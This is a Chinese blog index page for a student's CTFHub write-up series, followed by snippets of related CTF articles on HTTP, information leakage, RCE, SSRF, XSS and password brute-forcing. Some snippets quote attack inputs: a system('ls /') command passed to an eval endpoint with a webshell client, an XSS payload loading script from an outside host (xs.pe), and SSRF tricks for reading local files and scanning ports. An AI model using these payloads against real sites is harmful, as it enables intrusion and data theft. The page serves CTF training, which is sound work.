CTF之旅(CTFHub技能树+详细Write up+持续更新ing)(首页)

最新推荐文章于 2025-07-11 14:00:32 发布
原创 最新推荐文章于 2025-07-11 14:00:32 发布 · 7.7k 阅读 · 30 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web #1024程序员节

CTFHub题目WriteUP地址

本来不想分段的,但是后来发现要写的东西太多了,就写了个首页,汇总一下地址,大家见谅

1.web前置技能(已完结)
2.信息泄露(已完结)
3.密码口令+XSS(已完结)
4.SQL注入(已完结)
5.文件上传(已完结)
6.RCE(已完结)

前言

这里收录了我在CTFHub中做的题目和自己写的一些想法,首先我想稍微讲下个人经历,本人在今年寒假的时候初识CTF
,当时还在攻防世界上做了一些题目,但是后来有人跟我说攻防世界的题目比较老,建议我换个网站(这边没有诋毁攻
防世界的意思,每个人有每个人的想法),后来也因为学业较忙且基础太差无法开展此方面的学习,直到到了暑假,我
自学完了一些编程语言包括Python、Java等,网页的前后端知识也有所了解后,我继续在学长推荐的CTFHub上了我的
CTF之旅。

本人还是属于CTF小白,此文章也引用了一些大佬的资料,希望大家能够共同进步,废话不多说开始看 Write Up 吧!

注:CTFHub采用的是动态flag,我这道题的flag对了不代表你再复制进去也对哦!所以请不要偷懒,认真滴自己解决吧!

接下去可以根据地址去康康我写的WP吧!

CTF技能树
qq_38158710的博客
04-15 953
CTH技能树 持续更新中。。。。。。 WEB前置技能 ——HTTP协议 请求方式 HTTP Method is GET Use CTF**B Method, I will give you flag. Hint: If you got 「HTTP Method Not Allowed」 Error, you should request index.php. BurpSuite解法 挂上BurpSuite,重新打开题目 直接放过拦截到的第一个包如下图 拦截到的第二个包如下图 将拦截到的第二个包的GET改为
CTF相关了解
qq_44841017的博客
04-21 1763
基础知识 CTF简介 CTF(Capture The Flag,夺旗赛)CTF 的前身是传统黑客之间的网络技术比拼游戏,起源于 1996 年第四届 DEFCON,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。 CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中...
CTFHUB技能树详解(最全、最细、最易懂)
最新发布
Libra1313的博客
07-11 1250
最近闲的无聊,玩玩CTF吧,并把自己的解题思路分享给大家。大佬多指教。
CTF技能树,为初学者的一个认识ctf
10-22
ctf的一个树状图而已
ctfhub-彩蛋-首页
m0_62094846的博客
12-21 1608
首页输入*.ctfhub.com(给这个应该不是要我们输入这个url,而是提醒我们flag在某某.ctfhub.com下,就自然而然想到子域名) 查看页面,源代码,命令,抓包都没用 看wp才发现不是这个页面有flag,是它的子域名(之前查相似域名没有用) 一个一个试,在源代码下就有flag 子域名查询|ip反查域名 - DNSGrep ...
CTFHUB-技能树-web-信息泄露
qq_51780583的博客
06-04 1235
CTFHUB-技能树-web-信息泄露
CTFHub技能树
weixin_59480274的博客
04-23 5750
文章目录一、CTF基础知识1、CTF简介2、竞赛二、使用步骤1.引入库2.读入数据总结 一、CTF基础知识 1、CTF简介 开启题目 2、竞赛 开启题目 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ss
CTFhub技能树-Web-信息泄露
2301_81988171的博客
08-14 2394
在平常的工作中,当我们在单独拉取的功能分支中进行开发时,遇到线上出现bug需要进行紧急修复,我们需要切换到主分支,进行代码的修复。合理的方式应该是将功能分支的代码临时存储在某个位置,当我们切回到当前分支,读取该存储,将之前的改动恢复。这就引起了git泄露漏洞。当开发人员在线上环境中使用 vim 编辑器,在使用过程中会留下 vim 编辑器缓存,当vim异常退出时,缓存会一直留在服务器上,引起网站源码泄露。这样的命令,完美的解决了这个问题,其将当前未提交的修改(即工作区和暂存区的修改)先暂时储藏起来。
CTFHub技能树web之RCE(一)
wzhwzh123321的博客
02-18 877
根据代码可以看到该网页使用request得到cmd参数并使用eval执行cmd的代码,其中isset函数用于检测是否传入了一个名为cmd的变量的值(是否非空),eval是将一串字符作为php代码执行,$_REQUEST默认包含了。使用hackbar传递POST请求,file为php://input使得POST参数可以作为原始请求的数据,使用bp抓包,即可看到执行POST参数中代码后的内容。substr函数是返回字符串的子串,意思是如果file的前六个字符为php://,那么就会包含file文件。
CTFhub技能树-Web-密码口令
2301_81988171的博客
08-14 2119
攻城锤模式与狙击手模式类似的地方是,同样只使用一个payload集合,不同的地方在于每次攻击都是替换所有payload标记位置,而狙击手模式每次只能替换一个payload标记位置。使用Burp爆破密码,猜测用户名是admin,只需要爆破密码即可,同时爆破用户名和密码太费时间了。,在返回包中找到flag,如果太多可以使用过滤只看200状态码的响应。设置一下资源池中的爆破速度和间隔时间,否则会出现503响应发生。在网上找“亿邮件网关”的默认密码,一个一个尝试。总体也不影响,按返回长度排序,密码是。
谈谈CTF技能树
luobohong的博客
03-17 6836
嗨!今天来聊聊CTF中的技能树的五个分支--Web、Pwn、Reverse、Crypto、Misc。博主现在主要接触过Web,今后会学习其他五项技能。 一、Web 即万维网,我们日常上网浏览的网页主要由三部分组成--HTML、CSS和Javascrip。Html如同网页的骨干,它编辑了网页的标题、正文等内容;CSS做的是网页的外观,颜色、背景,让网页更加美观。Javascrip是一种脚本语言,可以制作一些动态效果,插入可以播放的视频,让网页更加人性化,易于使用。同时,web安全问题不容忽...
CTF之旅CTFHub技能树+详细Write up+持续更新ing)(RCE)
weixin_51563603的博客
11-26 4131
CTFHub题目WriteUP地址汇总 本来不想分段的,但是后来发现要写的东西太多了,就写了个首页,汇总一下地址,大家见谅 首页地址 REC eval执行 emm这道题我也不知道是为啥,跟着别人的教程在url中输入http://challenge-187cf816b7bf0349.sandbox.ctfhub.com:10800/?cmd=system(‘ls /’);这些东西我的浏览器不会返回任何东西。 那没办法了,只能连接蚁剑 由主页代码得知,这里的连接密码是cmd 点击测试链接,右下角出现绿色的连
复习HTTP状态码+301和302
weixin_30412577的博客
05-07 244
一,HTTP状态码: 1xx:(信息状态码),接受的请求正在处理。2xx:(成功状态码),请求正常处理完毕。3xx:(重定向状态码),需要进行附加操作以完成请求。4xx:(客户端错误状态码),服务器无法处理请求。5xx:(服务端错误状态码),服务器处理请求出错。 二,详解301和302跳转的区别:301:永久重定向。表示请求的资源已被分配了新的URI,搜索引擎也要替换成新的URI。302:临时...
CTFHub技能树-SSRF
qq_66105152的博客
07-24 1714
直接访问就行。
CTF之旅CTFHub技能树+详细Write up+完结)(密码口令+XSS)
weixin_51563603的博客
08-30 2196
目录其他CTFHub题目WriteUP地址前言密码口令弱口令 其他CTFHub题目WriteUP地址 本来不想分段的,但是后来发现要写的东西太多了,就分了几段写,大家见谅 1.web前置技能(完结) 2.信息泄露(完结) 前言 这里收录了我在CTFHub中做的题目和自己写的一些想法,首先我想稍微讲下个人经历,本人在今年寒假的时候初识CTF ,当时还在攻防世界上做了一些题目,但是后来有人跟我说攻防世界的题目比较老,建议我换个网站(这边没有诋毁攻 防世界的意思,每个人有每个人的想法),后来也因为学业较忙且
CTFHUB技能树——SSRF(一)
2401_82985722的博客
05-21 1894
大多是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。(7)从URL关键字中寻找(share、wap、url、link、src、source、target、u、display、sourceURl、imageURL、domain)(1)可以对外网、内网、本地进行端口扫描,某些情况下端口的Banner会回显出来(比如3306的);(5)使用file:///协议读取本地文件(或其他协议)
CTFHUB技能树——web
qq_63980959的博客
04-20 9711
因为我一开始是没打算写博客的,所有前面的图基本都没截图,以至于后面想写博客的时候没图,又没有金币了,我想吃西瓜都吃不到,更别说充金币。分币不花,玩的就是陪伴。前面的一些图来自于大佬们的博客,我会在结尾@出来。
CTFHUB技能树(全详细解析含进阶)
热门推荐
hxhxhxhxx的博客
01-17 3万+
HTTP协议 请求树 根据提示直接修改头即可 302跳转 直接重放获得302跳转, Cookie 字面意思, 基础认证 简介: 在HTTP中,基本认证(英语:Basic access authentication)是允许http用户代理(如:网页浏览器)在请求时,提供 用户名 和 密码 的一种方式。详情请查看 https://zh.wikipedia.org/wiki/HTTP基本认证 附件提供了密码,很明显就是爆破 有了用户名,而且发现一个base加密的东西 解密看看 固定格式啊,
ctfhub 技能树 hhtttp
01-06
### CTFHub 技能树介绍 CTFHub 是一个专注于网络安全竞赛(Capture The Flag, CTF)的学习平台,旨在帮助参与者提升在各种安全领域的能力。技能树是该平台上用于指导学习者逐步掌握不同类型的漏洞利用和技术的重要组成部分。 #### XSS 攻击中的 DOM 跳转技术 在处理特定的跨站脚本攻击(XSS)场景时,DOM跳转会涉及到URL解析和重定向逻辑。例如,在给定的例子中,通过访问带有特殊查询字符串的链接`http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800/?jumpto=http://example.com/`[^1],JavaScript代码会读取并解析这个 URL 参数来执行相应的操作。具体来说,`.split("=")`方法被用来分割参数名称与对应的值。 #### 利用 DOM 反射型 XSS 进行攻击 另一个重要的概念是在 Web 应用程序中存在的反射型 XSS漏洞。这种类型的攻击通常发生在服务器端未正确过滤用户输入的情况下。当恶意脚本作为响应的一部分返回给浏览器时就会触发此类攻击。比如下面这段 HTML 注入的内容可以绕过某些简单的防护机制: ```html ';</script><script src=//xs.pe/6b6></script> ``` 此片段会在页面加载过程中被执行,并尝试从外部资源加载额外的 JavaScript 文件[^2]。 为了有效应对这些威胁,开发者应该始终遵循最佳实践原则,如对所有不可信的数据进行严格的验证和编码处理;同时也要不断更新自己的知识体系以跟上最新的攻防趋势。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值